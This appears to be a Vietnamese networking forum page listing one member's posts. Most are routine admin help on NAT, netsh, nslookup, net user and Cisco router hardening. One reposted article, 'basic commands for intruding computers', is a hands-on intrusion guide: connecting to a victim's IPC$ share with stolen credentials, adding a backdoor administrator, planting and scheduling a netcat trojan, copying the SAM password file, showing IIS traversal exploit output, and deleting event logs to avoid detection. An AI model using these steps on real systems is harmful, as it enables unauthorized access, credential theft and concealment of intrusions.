banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: thangdiablo  XML
Profile for thangdiablo Messages posted by thangdiablo [ number of posts not being displayed on this page: 13 ]
 
Nhưng command trên nên hiểu cho đúng là những command để phục vụ cho công tác quản trị mạng được nhanh chóng và chuyên nghiệp hơn.
Đừng áp suy nghĩ đụng đến những command này là nghĩ đến attack

PXMMRF wrote:

dabu wrote:
Cấu hình mạng của em như sau :
Modem (ADSL)|192.168.1.1|==|192.168.1.2|PC1(2000server)|10.0.0.5|===|10.0.0.4|PC2(server2003).

Em đã NAT từ modem ADSL vào PC1 theo cổng 80 làm Webserver trên PC1 thì ok .
Nhưng em muốn làm Webserver trên PC2 chạy 2003 .

Em đã thử NAT từ 192.168.1.2 sang 10.0.0.5 (NAT thông qua routing and Remote access )rồi nhưng vẫn không truy cập vào Webserver chạy trên 2003 được ?

Không biết em đã cấu hình sai chổ nào chăng ? mong mọi người góp ý.Thanks !

smilie  


Tham khảo thêm môt số bài viết liên quan đến NAT của tôi trong vninformatics.com
Khi trên router bạn đã mổ cổng 80 thì các gói tin từ trình duyệt của môt client nào đó sẽ đến cổng 80 này và sau đó sẽ CHỈ CÓ THỂ ĐẾN MỘT CỔNG 80 CỦA MỘT MÁY DUY NHẤT TRONG MẠNG LAN . Máy này do bạn chỉ định trong rule khi thực hiện NAT .( thí dụ 10.0.0.5 )

Nếu bạn muốn chạy hai WEBSERVER đổng thởi trên cùng môt mạng LAN , mạng LAN như bạn mô tả ở trên . thì bạn phải mở môt cổng thứ hai , thường là cổng 8080 ( mở cổng 8080 trên router và cổng 8080 trên hệ thống [Webserver] ), cho webserver thứ hai (thí dụ 10.0.0.4)

Nhưng khi môt client muốn truy cập đến webserver thứ hai này thì họ phải đánh trên thanh đia chỉ như sau , thí du www.tencuaban.com:8080 .
Nếu chỉ đánh www.tencuaban.com thì hoàn toàn không thể truy cập đến webserver thứ hai nói trên

 


Anh PX chú ý mô hình của dabu la 2 Webser mắc nối tiếp nhau.
Nghĩa là webser 2 nối với Card mạng của WEBSER 1 chứ không phải 2 Webser này cùng gắn vào Switch

Như vậy nếu NAT WEBSERV 2 với port 8080 thì liệu có được không anh?
Vì packet từ ngoài WAN vào vẫn phải chạy qua và bị NAT bởi Router ADSL sau đó lại tiếp tục băng qua và bị NAT lần 2 bởi Web Ser thứ 1.
Vậy packet có đi tới được WebSer thứ 2 khi header bị lột ra thay vào 2 lần ?
Em có thứ rồi nhưng rất nhiều lần đều không được.
Nên em đành phải sử dụng chiêu cấu hình Bridge cho Modem ADSL và WEb SER 1 sẽ có trách nhiệm quay PPPoE và IP WAN sẽ nhảy thẳng vào NIC 1 của WEB SER 1. Như vậy đến lúc này Packet từ ngoài WAN đi vào sẽ chỉ bị lột header 1 lần thì mới vào được WEB SER 2.

PS: Giờ trong trường hợp em có 2 Webserver cắm chung và Switch. Em muốn cả 2 đều được NAT thẳng vào port 80 để thuận tiện cho người sử dụng và cũng là để để load balance với nhau thì theo anh dùng cơ chế nào là tốt nhất?
2 Server này cũng host 1 website duy nhất.
Mong anh chỉ giáo

xoai13388 wrote:
ehehe -.-" status thì FPT lúc nào của em chảng 3Mbps nhưng ban ngày down cũng chỉ 80kb/s

So sánh với khu vực mình cũng chưa hơn đâu. Như Thailand theo thống kê có 8 triệu người dùng internet trong khi Việt nam là 12 triệu nhưng băng thông quốc tế của Thailand gấp rưỡi Việt Nam. -.-"

Mà ở US vẫn dùng dial up ầm ầm smilie  


Theo quảng cáo cũng như theo như status hiển thị trên modem ADSL thì đó chỉ là speed trên đường backbone. Nghĩa là với 3Mbps đó thì nhà nhà dùng chung , người người đi chung chứ không phải mỗi người 1 đường 3Mbps.

dabu wrote:

Theo dabu thì vấn đề băng thông dùng cho đầu cuối tiếp tục là đề tài tranh luận .
Có người Mỹ qua xài Internet ở Viet Nam nghe giới thiệu up/down :640/3072Mb/s tưởng rằng đó là sự thật, sau khi đăng kí xong thì tốc độ ra ngoài VN chỉ khoảng 20-40KB/s, họ la làng.Đúng là tiêu chuẩn VN nó khác , nhiều người còn nói vậy thì sao VN gia nhập WTO.  


Ông tây kia thắc mắc vì kinh doanh của nước ngoài thật thà còn với Việt Nam thì...Kinh Doanh phải nói thế. Mà nghĩ lại cũng nói có sai đâu :lol:

CuistreNguyen wrote:
Sao mà cái lệnh ShutDown hình như chỉ xài được cho Winnt thôi chứ win 2k hay xp thì thua

Mà mình nghĩ rằng cách này có vẻ đã quá cổ điển chỉ để nghịch cho vui chứ cũng chẳng làm được gì máy người khác  


2k nó không có lện shutdown. Nhưng trong XP thì được

Command

shutdown -t xx (time/s) /s /m \\Computername
 
Hi,
Về cấu hình theo kiểu Bridge thông qua việc tạo một connection thì em làm được.
Thanhdiablo có thể chỉ em cách quay PPPoE theo kiểu RAS trong Routing and Remote Access được hông ?
Có phải tạo một New demand-dial Interface không?
Còn cách thangdiablo nói là Header sẽ bị vỡ em sẽ nghiên cứu thử xem .
Thanks.  

Thì trên PC1 tạo acc quay số PPPoE
My network place --- New network connection cho đơn giản.
Việc gì phải dùng tới RAS cho mất công.
Còn đã bị vỡ header rồi thì sao mà vào được nữa. smilie
Thân

dabu wrote:
Cấu hình mạng của em như sau :
Modem (ADSL)|192.168.1.1|==|192.168.1.2|PC1(2000server)|10.0.0.5|===|10.0.0.4|PC2(server2003).

Em đã NAT từ modem ADSL vào PC1 theo cổng 80 làm Webserver trên PC1 thì ok .
Nhưng em muốn làm Webserver trên PC2 chạy 2003 .

Em đã thử NAT từ 192.168.1.2 sang 10.0.0.5 (NAT thông qua routing and Remote access )rồi nhưng vẫn không truy cập vào Webserver chạy trên 2003 được ?

Không biết em đã cấu hình sai chổ nào chăng ? mong mọi người góp ý.Thanks !

smilie  


Không được vì làm theo kiều này packet đì từ ngoài WAN vào được tới PC2 thì sẽ bị vỡ header.

Giờ muốn làm được chỉ có cách là cấu hình Modem ADSL theo kiểu bridge sau đó PC 1 quay số PPPoE và IP WAN sẽ nhận thẳng vào NIC 1 của PC 1.
Sau đó PC 1 chỉ phải NAT 1 lần duy nhất để packet vào được PC 2.
Thân

hacker88_vnn wrote:
Minh` dang muon mac mang. Lan 2 may' nhung kho^ng duoc chang hieu? vi` sao.
Minh` vua` mua 1 cong? mang Lan 45m day nhung khong biet la` ho ban' day sai khong ma` 2 may' ket' no^i' chang? nhin` thay' nhau gi` ca?
Minh` nghe may' nguo`i ta noi' noi' mang Lan thi` phai? no^i' day cheo' vay co' dung' ko? (Hom nguoi` ta cat ho minh` thi` ho. lai cat day thang).
Vay do da^y hay do may' mong cac' ban giup' do~
Minh` xin cam? o*n nhieu` smilie 


Yêu cầu lần sau bạn post tiếng việt có dấu rõ ràng để mọi người dễ theo dõi.
Thân :!:
Các lệnh cơ bản xâm nhập máy tính

Chào các bồ...hôm nay tớ xin port bài CÁC LỆNH CƠ BẢN XÂM NHẬP...nếu bài nayw quá dở thì xin đừng chê nghe...cám ơn nhiều....

thực ra thí tớ thấy viết những bài này tốt hơn là viết những bài hacking không tài nào thực hiện thành công....nhưng đây chỉ là suy nghỉ của tớ...ai cũng có khiếu điểm mà ?

Phần 1 : Net

chỉ cần bạn có được User và Passwords của một IP nào trên Net...thế là bồ có thể kết nói một IPC$ rồi đấy....

bây giờ tớ xin ví dụ là bạn có được User la hbx và passwords : 123456...IP : 127.0.0.1

cậu hãy mở trình Ms dos và gõ vào lệnh sau :

Net use \\127.0.0.1\ipc$ "123456" /user:"hbx" đẩ kết nồi một IPC$ với máy victtim

nhưng thao tác tiếp theo..bạn nhất thiết phải login xong mới có thể sử dũng

-----------------------------------------------------------------------------------------------

bây giờ chúng ta nói tiếp làm thế nào để tạo một user mới nghe...

chúng ta cộng thệm môt user mới là heibai và password lovechina

Net user heibai lovechina / add

nếu bạn thành công..thì có thể cộng user này vào nhom Adminstrator

Net Localgroup Adminstrator heibai / add

----------------------------------------------------------------------------------------------------

trong phần này tớ hướng dẫn tạo một ổ đỉa Ảo trên computer

Net use z: \\127.0.0.1\C$ ( hoặc là IPC$ )

Z là của mình...còn C$ là của Victim

-------------------------------------------------------------------------------------------------------

Phần 2 : AT

thông thường thì khi độp nhập vào máy tính..chúng ta sẻ tặng quà lưu niệm cho victim trước khi rút lui,....vậy khi copy trojan lên máy rồi...làm thế nào dể khới động nó đây ?

chúng ta phải dùng đến lệnh AT thôi.....

đầu tiên...chúng ta cần biết thời gian của đối phương

Net time \\127.0.0.1

bây giờ thì nó sẽ phản hồi thời gian của victim...vd : 12:0 ..
tiếp theo..chúng ta cần tạo môt homework ID = 1

AT \\127.0.0.1 12:3 nc.exe

ở đây giả thiết là tui có con trojan la Nc.exe và đã được copy lên máy victim rồi

* giới thiệu chút it về NC...NC là từ viết tắc của NETCAT....nó là một telnet server với port 99

đợi đến 12:3 là nó sẽ tự chạy trên máy nạn nhân và chúng ta có thể connected đến port 99..thế là xong phần lưu bút

---------------------------------------------------------------------------------------------------------

phần 3 : Telnet

đây là một lệnh rất cần thiết khi xâm nhập máy tính...nó có thể kết nối vớ máy tính khắc từ xa..nhưng thường thi phải có I D & PW..nhưng nếu máy đã Ăn Đạn rồi thì bạn chỉ cần connected đến port 99 là ok

Telnet 127.0.0.1 99

thế là bồ đã kết nối đến port 99 và có thể thực hiện tất cả các lệnh...

-----------------------------------------------------------------------------------------------------------

Phần 4 : Copy

bây giờ chúng ta nói tiêp...làm thế nào để copy files trên máy mình lên máy victim và làm ngược lại....nhưng bạn phải có kết nối IPC$ cái đã....

chúng ta copy files index trên ổ C của mình lên ổ C của 127.0.0.1

Copy Index.html \\127.0.0.1\C$\index.html

nếu bạn copy lên folder winNt

Copy index.html \\127.0.0.1\admin$\index.html

muốn copy files trên máy victm thì bạn gõ vào :

Copy \\127.0.0.1\Admin$\repair\sam._c:\

------------------------------------------------------------------------------------------------

phần 5 : Set

nếu bạn muốn hack một website......tất nhiến là phải mở port 80..nếu không thì cậu hack cho ai xem ?

đã tới lúc dùng lệnh Set rồi

sau đây là kết quả mà tớ tìm thấy......chúng ta phân tích nghe....chủ yếu là muốn biêt homepage nó ở đâu thôi.....

COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST= DAY LA SO IP CUA TUI..NHUNG TUI DEL ROIHTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot DAY LA URL CUA HOMEPAGE, CHI CAN NHIN SAU DONG PATH_TRANSLATED= LA BIET NO O DAU 。O DAY LA E:\vlroot PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT

đây là cách khá ngu..nhưng chỉ có cách này mới 100% biết đuợc homepage tên gì..ở ảâ ? khi cậu Dir ..chắc chắn là sẽ View được rất nhiều files đấy`.....

---------------------------------------------------------------------------------------

phần 6 : Nbtstat

nếu cậu Scan đuợc một máy sữ dụng Winnt...open port 135-139...thế thì bồ phải dùng lệnh này để biết thêm user thôi...

* tiện thể xin nói luôn...đây là netbios....sau khi có user rồi bạn có thể đoán mò password..nếu không thi Cracking luôn đi

Nbtstat - A XXX.XXX.XXX.XXX

sau đây là kết quả tớ scan được.....

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
Registered Registered Registered Registered Registered Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP

kết quả cho biết User là PENTIUMII。

-------------------------------------------------------------------------------------------

phần 7 : Shutdown

nhìn lệnh thôi cũng đủ biết rồi phải hông ? đây là lệnh shutdown server Winnt

Shutdown \\127.0.0.1 t:20

20 giây sau...Winnt sẽ tự khời động lại.......hi vọng các bạn suy nghỉ kỷ trước khi dùng lệnh này....vì nó sẽ làm tổn thất rất nặng cho victim...hãy làm tay hacker có đạo đức

---------------------------------------------------------------------------------------------------------------------------------

phần 8 : Dir....

lệnh này không có gì để nói hết..chỉ dùng để view thôi.................

-----------------------------------------------------------------------------------------------

phần 9 : Del

lệnh này giống như xoá nhật ký vậy đó.....khi chúng ta xâm nhập máy tình...trên hệ thống sẽ lưu lại thông tin của chúng ta..vì thế..nên del nó đi...chư muốn bị tóm cổ hả ?

sau đây là những files nhật ký của Winnt

del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log

chỉ cần del hết là coi như xong

-------------------------------------------------------------------------------------------------------------------

những lệnh trong ms dos còn rất nhiều....như lệnh ECHO .....FTP.........ATTRIB.......nhưng vì còn nhiều lắm...tớ không tài nào đề cập hết trong một bài...mông các bạn hiểu cho và thông cảm nghe......

Bài viết : Venom
Còn nữa nè: Các lệnh truy cập vào admin tools:
-------------------------------------------------------------
AD Domains & Trusts domain.msc
AD Sites & Services dssites.msc
AD Schema Manager schmmgmt.msc
AD Users & Computer dsa.msc
Backup backup
Certification Authority certsrv.msc
Component Services comexp.msc
Computer Management compmgmt.msc
DHCP dhcpmgmt.msc
Distributed File System dfsgui.msc
DNS dnsmgmt.msc
Domain Controller Security Policy dcpol.msc
Domain Security Policy dompol.msc
Event Viewer eventvwr
Indexing Service ciadv.msc
Internet Authentication Service ias.msc
Internet Service Manager iis.msc
Local Security Policy secpol.msc
Network Monitor netmon
Routing & Remote Access rasmgmt.msc
Task Manager taskmgr
Telnet Server Administration tlntadmn
Terminal Service Manager tsadmin
Terminal Service Client mstsc

Cấu Hình IP bằng command line

Để cấu hình địa chỉ IP, DNS, WIN bằng command line.
Các bạn thực hiện các bước sau:
Vào của sổ command prompt.
gõ lệnh:
netsh <Enter>
interface IP <Enter>

<--Set IP Address-->
set address name= "Local Area Connection" source=dhcp <Enter>
set address local static <IP Address> <IP Supnet Mask <Enter>
vidu:
set address name= "Local Area Connection" source=dhcp <Enter>
set address local static 192.168.1.2 255.255.255.0 <Enter>

<--Set Preferred DNS Server -->
set dns name= "Local Area Connection" source=dhcp <Enter>
set DNS Local Area Connection" static <IP Address DNS> <Enter>

vidu:
set dns name= "Local Area Connection" source=dhcp <Enter>
set DNS "Local Area Connection" static 192.168.1.1 <Enter>

<--Set WINS address-->

set wins name= "Local Area Connection" source=dhcp <Enter>
set wins Local Area Connection" static <IP Address WINS> <Enter>

vidu:
set wins name= "Local Area Connection" source=dhcp <Enter>
set wins "Local Area Connection" static 192.168.1.1 <Enter>

<--De thoat khoi chuong trinh--->

Exit <Enter>

ShutDown một máy tính trong môi trường mạng từ xa(chỉ xải công cụ trong Windows) thì đòi hỏi một số yêu cầu sau :
1. Về công cụ để thực hiện : - Terminal Service
- hoặc NetMeeting application
- Computer Management
- Windows Command : SHUTDOWN trong bộ Resource Kit
2. Yêu cầu về quyền hạn của người dùng :
Tốt hơn hết, bạn có quyền Administrator trong môi trường mạng. Ví dụ: thuộc nhóm Administrators hoặc Domain Admin. Chú ý : một máy đã tham gia môi trường domain thì bao giờ bạn cũng có thể shutdown nó cho dù bạn không có username và password của Administrators locally.
HƯỚNG DẪN THỰC HÀNH : Sử dụng COMPUTER MANAGEMENT
Yêu cầu : Cần thiết lập môi trường domain để thấy được sự tối ưu khi triển khai quản trị hệ thống mạng. Giả sử trong mạng có các máy: PC1, PC2 tham gia môi trường domain MCP.COM và máy DOMAIN CONTROLLER DC1
Các bước cụ thể :
1. Logon ở máy PC1 bằng tàu khoản thangdiablo@mcp.com(thuộc nhóm Domain Users). Chú ý tài khoản này không có quyền hạn gì cả. Nhưng chúng ta sẽ sử dụng RUNAS với tài khoản là administrator@mcp.com để làm thao tác shutdown máy PC2
2. Vào RUN gõ : runas /user:administrator@mcp.com "mmc %systemroot%/system32/compmgmt.msc"
SAU ĐÓ : gõ password của administartor@mcp.com
3. Ở Computer Management[với quyền administrator@mcp.com], Chọn mục : CONNECT TO ANOTHER COMPUTER, gõ IP của PC2 hoặc tên máy là PC2.
Chọn PROPERTIES | tab Advanced| tab STARTUP and RECOVERY | tab SHUTDOWN và .... SHUTDOWN máy PC2.
4. Hết rồi
Chúc các bạn thử thành công.
PS : Chú ý là vừa sử dụng RUNAS vừa SHUTDOWN từ xa.

Nói về commandline, tui xin góp 1 lệnh nhé
-----------------------------------------------------------------------------------------
C:\>nslookup
Default Server: hcm-server1.vnn.vn
Address: 203.162.4.1
Aliases: 1.4.162.203.in-addr.arpa
Cho bieát DNS server mà client gởi query lên ở đâu !!?

C:\>nslookup ?
Usage:
nslookup [-opt ...] # interactive mode using default server
nslookup [-opt ...] - server # interactive mode using 'server'
nslookup [-opt ...] host # just look up 'host' using default server
nslookup [-opt ...] host server # just look up 'host' using 'server'

C:\>nslookup www.yahoo.com
Server: hcm-server1.vnn.vn
Address: 203.162.4.1
Aliases: 1.4.162.203.in-addr.arpa

Non-authoritative answer:
Name: www.yahoo.akadns.net
Addresses: 66.94.230.35, 66.94.230.32, 66.94.230.41, 66.94.230.46
66.94.230.39, 66.94.230.38, 66.94.230.42, 66.94.230.45
Aliases: www.yahoo.com
Query www.yahoo.com record từ client đến server


Tìm kiếm các record MX, NS, A, SOA, CNAME, . . . của một server bằng NSLOOKUP

C:\>nslookup
Default Server: hcm-server1.vnn.vn
Address: 203.162.4.1
Aliases: 1.4.162.203.in-addr.arpa

> set type=MX
> yahoo.com
Server: hcm-server1.vnn.vn
Address: 203.162.4.1
Aliases: 1.4.162.203.in-addr.arpa

Non-authoritative answer:
yahoo.com.vn-study.com MX preference = 10, mail exchanger = mail.vn-study.com

vn-study.com nameserver = dns1.name-services.com
vn-study.com nameserver = dns2.name-services.com
vn-study.com nameserver = dns3.name-services.com
vn-study.com nameserver = dns4.name-services.com
vn-study.com nameserver = dns5.name-services.com
mail.vn-study.com internet address = 203.162.2.17
dns1.name-services.com internet address = 63.251.163.102
dns2.name-services.com internet address = 216.52.184.230
dns3.name-services.com internet address = 63.251.83.36
dns4.name-services.com internet address = 64.74.96.242
dns5.name-services.com internet address = 212.118.243.99
dns5.name-services.com internet address = 212.118.243.100
dns5.name-services.com internet address = 212.118.243.101
Query MX record : danh saùch mail server

> set type=A
> yahoo.com
Server: hcm-server1.vnn.vn
Address: 203.162.4.1
Aliases: 1.4.162.203.in-addr.arpa

Non-authoritative answer:
Name: yahoo.com
Address: 66.218.71.198
Query A record(Host) cuûa moät server

> set type=SOA
> yahoo.com
Server: hcm-server1.vnn.vn
Address: 203.162.4.1
Aliases: 1.4.162.203.in-addr.arpa

DNS request timed out.
timeout was 2 seconds.
Non-authoritative answer:
yahoo.com
primary name server = hidden-master.yahoo.com
responsible mail addr = hostmaster.yahoo-inc.com
serial = 2004021604
refresh = 900 (15 mins)
retry = 300 (5 mins)
expire = 604800 (7 days)
default TTL = 600 (10 mins)

yahoo.com nameserver = ns1.yahoo.com
yahoo.com nameserver = ns2.yahoo.com
yahoo.com nameserver = ns3.yahoo.com
yahoo.com nameserver = ns4.yahoo.com
yahoo.com nameserver = ns5.yahoo.com
ns1.yahoo.com internet address = 66.218.71.63
ns2.yahoo.com internet address = 66.163.169.170
ns3.yahoo.com internet address = 217.12.4.104
ns4.yahoo.com internet address = 63.250.206.138
ns5.yahoo.com internet address = 216.109.116.17
>
Query SOA record, coù ñöôïc nhöõng thoâng soá replication cuûa server yahoo.com

C:\>nslookup
Default Server: hcm-server1.vnn.vn
Address: 203.162.4.1
Aliases: 1.4.162.203.in-addr.arpa

> server www.yahoo.com
Default Server: www.yahoo.akadns.net
Addresses: 66.94.230.42, 66.94.230.44, 66.94.230.34, 66.94.230.41
66.94.230.33, 66.94.230.36, 66.94.230.43, 66.94.230.39
Aliases: www.yahoo.com
>


C:\>nslookup

>ls [-a, d, t type ] domain [>filename]
---------------------------------------------------------------------
Tạo User bằng Command Line ngồi từ máy user

connect bằng quyền admin và....


NET USER [username [password | *] [options]] [/DOMAIN]
username {password | *} /ADD [options] [/DOMAIN]
username [/DELETE] [/DOMAIN]

Ví dụ một trường hợp
NET USER THUNGHIEM /ADD sẽ add một user vào Group User với password rỗng.
NET USER TEST 123 /ADD sẽ add một user TEST với Password là 123 vào Group User hoặc Domain user.
Chú ý, nếu chỉ sử dụng trong môi trường Group thì chỉ có thể tạo được User ở máy Local.
Nếu dùng trong môi trường Domain, mọi chuyện lại dễ.
Ngoài ra, còn những Option khi tạo User (giống như động tác click chuột trên GUI)

Options Are as follows:

Options Description
--------------------------------------------------------------------
/ACTIVE:{YES | NO} Activates or deactivates the account. If
the account is not active, the user cannot
access the server. The default is YES.
/COMMENT:"text" Provides a descriptive comment about the
user's account (maximum of 48 characters).
Enclose the text in quotation marks.
/COUNTRYCODE:nnn Uses the operating system country code to
implement the specified language files for a
user's help and error messages. A value of
0 signifies the default country code.
/EXPIRES:{date | NEVER} Causes the account to expire if date is
set. NEVER sets no time limit on the
account. An expiration date is in the
form mm/dd/yy or dd/mm/yy, depending on the
country code. Months can be a number,
spelled out, or abbreviated with three
letters. Year can be two or four numbers.
Use slashes(/) (no spaces) to separate
parts of the date.
/FULLNAME:"name" Is a user's full name (rather than a
username). Enclose the name in quotation
marks.
/HOMEDIR:pathname Sets the path for the user's home directory.
The path must exist.
/PASSWORDCHG:{YES | NO} Specifies whether users can change their
own password. The default is YES.
/PASSWORDREQ:{YES | NO} Specifies whether a user account must have
a password. The default is YES.
/PROFILEPATH[:path] Sets a path for the user's logon profile.
/SCRIPTPATH:pathname Is the location of the user's logon
script.
/TIMES:{times | ALL} Is the logon hours. TIMES is expressed as
day[-day][,day[-day]],time[-time][,time
[-time]], limited to 1-hour increments.
Days can be spelled out or abbreviated.
Hours can be 12- or 24-hour notation. For
12-hour notation, use am, pm, a.m., or
p.m. ALL means a user can always log on,
and a blank value means a user can never
log on. Separate day and time entries with
a comma, and separate multiple day and time
entries with a semicolon.
/USERCOMMENT:"text" Lets an administrator add or change the User
Comment for the account.
/WORKSTATIONS:{computername[,...] | *}
Lists as many as eight computers from
which a user can log on to the network. If
/WORKSTATIONS has no list or if the list is *,
the user can log on from any computer.

Những Option trên chính là những phần Click chuột mà bạn thường hay sử dụng khi tạo trong Computer management, hoặc là dùng AD Computer and Users.

Ứng dụng tốt nhất của việc dùng Command line là: Bạn có thể tạo ra cùng một lúc nhiều User có chức năng tương tự nhau, bạn chỉ mất khoảng thời gian Edit và Test command đầu tiên, sau đó chỉ việc Copy và chỉnh sửa chút xíu, là có thể tạo thành một Teplate hoàn chỉnh rồi.
Good luck!
access-list 110 deny tcp any host $yourRouterIP eq 7
access-list 110 deny tcp any host $yourRouterIP eq 9
access-list 110 deny tcp any host $yourRouterIP eq 13
access-list 110 deny tcp any host $yourRouterIP eq 19
access-list 110 deny tcp any host $yourRouterIP eq 23
access-list 110 deny tcp any host $yourRouterIP eq 79
 


Ghi chú thêm để các bạn dễ hiểu. Mấy số 9 13 19 23 79 những reserved port UDP và TCP.
9 là Discard
13 là Daytime
19 là Chargen
23 là Telnet
25 là SMTP

Với TCP/IP thì ACLs có 2 loại chính là Standard IP và Extended IP (có thể accpet or deny các port)
Nhìn cách cấu hình IP phía trên chúng ta có thể thấy đó là ACLs Extended IP.

Và với ACLs Extended này chúng ta nên đặt gần Router Source.
Một điều rất quan trọng để bảo vệ tất cả mật khẩu của bạn là dùng thuật toán mạnh nhất nếu có thể. Mật khẩu từ chế độ exec được cấp quyền truy cập đến hệ thống IOS. Có thể dùng MD5, hiện giờ mạnh nhất trong Cisco IOS.

enable secret $yourpassword

Lệnh dùng để mã hóa tất cả mật khẩu hiện thời trong hệ thống là

service password-encryption  


Command thứ 1 là creat password để vào Exec mode có encryption với thuật toán MD5 của Cisco .
Command thú 2 để encryption password khi muốn access vào user mode, telnet , aux.
Những cách tấn công thông dụng:

Malicious Association - Khi kẻ ác ra tay

Kẻ phá hoại có thể sử dụng những tool ở trên hoặc tìm kiếm trên internet tạo 1 kết nối hợp pháp vào Access Point và có thể thay đổi sửa chữa lại cấu hình của WLAN.Hacker có thể dụng tools HostAP để giả lập máy mình như một Access Point khi một nạn nhân(máy trạm) bất kỳ gởi yêu cầu kết nối thông qua Access Point thì sẽ được máy của hacker (đã được giả lập làm Access Point) tạo kết nối đến.Thậm chí hacker có thể cấp IP (DHCP) cho máy nạn nhân và bắt đầu khai thác phiên làm việc này để tấn công.

Lúc này kẻ phá hoại có thể khai thác mọi lỗ hổng của máy tính của nạn nhân một cách dễ dàng bằng các công cụ có sẵn trên internet hoặc bằng thủ thuật riêng của kẻ phá hoại.Sau đó hắn có thể lợi dụng máy tính này để tấn công tiếp trong mạng.
Cách tấn công này cho thấy rằng các máy trạm không quan tâm hoặc không cần biết network hoặc Access Point mình kết nối vào.Nạn nhân có thể bị bẫy hoặc bị ép buộc kết đến Access Point giả lập của ai đó cố ý phá hoại.Thậm chí WLAN có dùng VPN cũng không thoát khỏi số phận vì kiểu tấn công này không phải đánh vào break VPN mà nó đánh vào sự yếu kém về kiến thức mạng của admin và người sử dụng.

Để tránh tình trạng này hệ thống phải luôn được giám sát và giám sát luôn không gian kết nối của WLAN để chắc chắn rằng các máy trạm luôn được kết nối với các trạm kết nối (Access Point) đã được phê chuẩn.Giám sát thường xuyên là cách duy nhất để bạn quản lý WLAN 1 cách tốt hơn, biết rõ các kết nối của máy trạm và Access Point

MAC Spoofing-Identity theft - Kẻ cắp giả danh

Có nhiều hệ thống WLAN sử dụng phương thức phê chuẩn cho phép kết nối khi máy trạm có địa chỉ MAC đã được phê chuẩn trên AcessPoint.
Công cụ sử dụng trong các tấn công này có thể kể đến Kismet hoặc Ethereal, rất dễ cho hacker thay đổi địa chỉ MAC và trở thành 1 kết nối hợp lệ, được phê chuẩn.
Để giám sát không gian của hệ thống WLAN ta có thể phát hiện ra địa chỉ MAC giả mạo bằng cách kiểm tra sự trùng lắp của nhiều địa chỉ MAC trên hệ thống.Hệ thống phòng chống và phát hiện (IDS) của Wireless Lan sẽ phát hiện sự giả mạo bằng cách phân tích ‘fingerprints’ của nhà sản xuất LAN card.Cái này là duy nhất.

Man-in-the-Middle Attacks: Người đứng giữa

Cũng giống những kiểu tấn công theo kiểu giả dạng khá, một “Kẻ đứng giữa” có thể xuyên thủng 1 kết nối bảo mật VPN (Virtual Private Network) giữa 1 máy trạm và trạm kết nối.Bằng cách chèn 1 trạm kết nối giả lập giữa máy trạm và trạm kết nối, kẻ phá hoại nghiễm nhiên trở thành “man in the middle” và hắn ta sẽ giả lập thành Trạm kết nối đối với máy trạm và thành máy trạm đối với trạm kết nối
“kẻ đứng giữa” sẽ buộc máy trạm đăng nhập lại vào trạm kết nối - nạn nhân sẽ phải đáp ứng và đăng nhập lại lên Access Point và ngược lại Access Point phải đáp ứng kết nối thành công và dĩ nhiên thông qua “kẻ đứng giữa” đáng ghét.
Để bắt đầu 1 cuộc tấn công, hacker âm thầm thu thập các thông tin quan trọng của máy trạm khi kết nối đến Access Point như username, servername, địa chỉ IP của client và server, ID dùng để kết nối, các phương thức phê chuẩn…
Sau đó hacker này sẽ kết nối với Access Point bằng cách gởi yêu cầu kết nối với thông tin trên và hiển nhiên thông tin yêu cầu này là của 1 máy trạm hợp lệ.Access Point sẽ yêu cầu kết nối VPN đến máy trạm, khi máy trạm nhận được yêu cầu sẽ gởi thông tin để tạo kết nối.”Kẻ đứng giữa” sẽ lắng nghe những thông tin này từ 2 phía để thu thập thông tin đáp ứng .Sau khi “lắng nghe” tất cả quy trình kết nối thì “kẻ đứng giữa” này bắt đầu hành động .Hắn sẽ gởi tín hiểu giả mạo với gói lượng dữ liệu lớn tăng dần và đá văng kết nối của máy trạm hợp lệ ra khỏi hệ thống và tiếp tục gởi để ngăn máy trạm không thể kết nối (vd: 0x00ffffff).Lúc này hắn đàng hoàng đi vào hệ thống như 1 máy trạm hợp lệ.

Với kiểu tấn công này chỉ có cách 24/7 giám sát hệ thống bằng cách thiết lập IDS đúng sẽ phát hiện và ngăn chặn kiểu tấn công này.

Denial-of-Service Attacks : Hack không được thì cho mày chết.

